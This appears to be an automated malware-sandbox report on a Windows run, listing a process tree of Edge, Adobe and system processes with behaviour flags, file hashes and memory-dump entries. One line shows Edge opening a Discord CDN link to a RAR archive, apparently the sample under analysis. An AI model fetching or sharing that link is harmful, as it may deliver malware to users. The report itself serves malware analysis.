C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6d27f5460,0x7ff6d27f5470,0x7ff6d27f54804⤵PID:5176
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6880 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5412 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6604 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:5528 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1816 /prefetch:83⤵PID:1920
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/958958106811977752/961145090439512094/tt-copy.rar2⤵PID:220
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8a11946f8,0x7ff8a1194708,0x7ff8a11947183⤵PID:2356
-
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:32⤵
- Suspicious use of SetWindowsHookEx
PID:1860 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"3⤵PID:4348
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:5252
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1588
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4604
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2440
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5208
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5088
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5504
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6Filesize
471B
MD5040801c3c7a1d7fcaf375e86ec6d66d8
SHA1df817e1fafaa8f1f24a0cfdb566811cc38c12b15
SHA256f13ad12d1c4a317f523bdcdfd8799058defe754e50aeda2bfd8bf7cb686d0d8a
SHA5129f3dc51899fbecece4041c54b0ff88d5f03f161645e881080c3f81cbd8fff07ccd2294396cf0cf402a4c17c3ec347abd1a42d92bcbea8bfa19e267e8d4750631
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6Filesize
434B
MD5e0da35c19d5d16bc756a821c114b2661
SHA106de7beaf90d8baa2a9a48e69f4d6110070b21dd
SHA256b4831f5a4150ced8a46c5f65cf543eba41cb4864f9eefd1f55c7436a97e84be8
SHA5121537a20284b8a58d5ba449ebe4c086f1d5aecef1c4b7456ec8edeb936f39598693bb55306e86addeaa242df54391b893494e30d603dcc6936bfe973730e27595
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD57c709b14135a1c77814a526a2b460a97
SHA1547bd68514a32a612c7c98e5324a35ea5b39d7a2
SHA256ef9d2108ad41aa1480db4b633bcf66c964b5d8d8aab6f3372143242affd948d4
SHA512baeb04f10ec0383f15ed5cfdf3242b69cbe3f166872012e5b85e83ca95e276623f62a923accc615394fd4058abe61809645f2cdaa0fafee099962a04541021c4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD599e5dfeaf31981eb1b05a78f7ebf588c
SHA1d325e91325d838df555b7546059cafe1251c6ae1
SHA2564a42d1322fc968609a912cc94bcc07b715e3d954d89942db47d4832b0d6a8e0a
SHA512f8d20de3b3a788545f9ebb41e90c5985d6f537996b09497606ea674f0b111d094b9956851826be2606c5cd4fc364fff0aeb7d4361e58c4e8717245ddc8749707
-
\??\pipe\LOCAL\crashpad_4612_DMUARKFPPEQNORGKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/32-129-0x0000000000000000-mapping.dmp
-
memory/208-132-0x0000000000000000-mapping.dmp
-
memory/220-164-0x0000000000000000-mapping.dmp
-
memory/1140-145-0x0000000000000000-mapping.dmp
-
memory/1420-195-0x0000000000000000-mapping.dmp
-
memory/1604-189-0x0000000000000000-mapping.dmp
-
memory/1772-159-0x0000000000000000-mapping.dmp
-
memory/1852-151-0x0000000000000000-mapping.dmp
-
memory/1852-153-0x00007FF8BD340000-0x00007FF8BD341000-memory.dmpFilesize
4KB
-
memory/1860-171-0x0000000000000000-mapping.dmp
-
memory/1920-200-0x0000000000000000-mapping.dmp
-
memory/2184-180-0x0000000000000000-mapping.dmp
-
memory/2356-165-0x0000000000000000-mapping.dmp
-
memory/3112-125-0x0000000000000000-mapping.dmp
-
memory/3140-137-0x0000000000000000-mapping.dmp
-
memory/3148-192-0x0000000000000000-mapping.dmp
-
memory/3152-173-0x0000000000000000-mapping.dmp
-
memory/3236-168-0x0000000000000000-mapping.dmp
-
memory/3540-142-0x0000000000000000-mapping.dmp
-
memory/3576-152-0x0000000000000000-mapping.dmp
-
memory/3688-155-0x0000000000000000-mapping.dmp
-
memory/4156-183-0x0000000000000000-mapping.dmp
-
memory/4268-124-0x0000000000000000-mapping.dmp
-
memory/4344-162-0x0000000000000000-mapping.dmp
-
memory/4348-178-0x0000000000000000-mapping.dmp
-
memory/4612-126-0x0000000000000000-mapping.dmp
-
memory/4620-176-0x0000000000000000-mapping.dmp
-
memory/4648-127-0x0000000000000000-mapping.dmp
-
memory/4672-191-0x0000000000000000-mapping.dmp
-
memory/4824-186-0x0000000000000000-mapping.dmp
-
memory/4908-148-0x0000000000000000-mapping.dmp
-
memory/5176-196-0x0000000000000000-mapping.dmp
-
memory/5412-197-0x0000000000000000-mapping.dmp
-
memory/5528-198-0x0000000000000000-mapping.dmp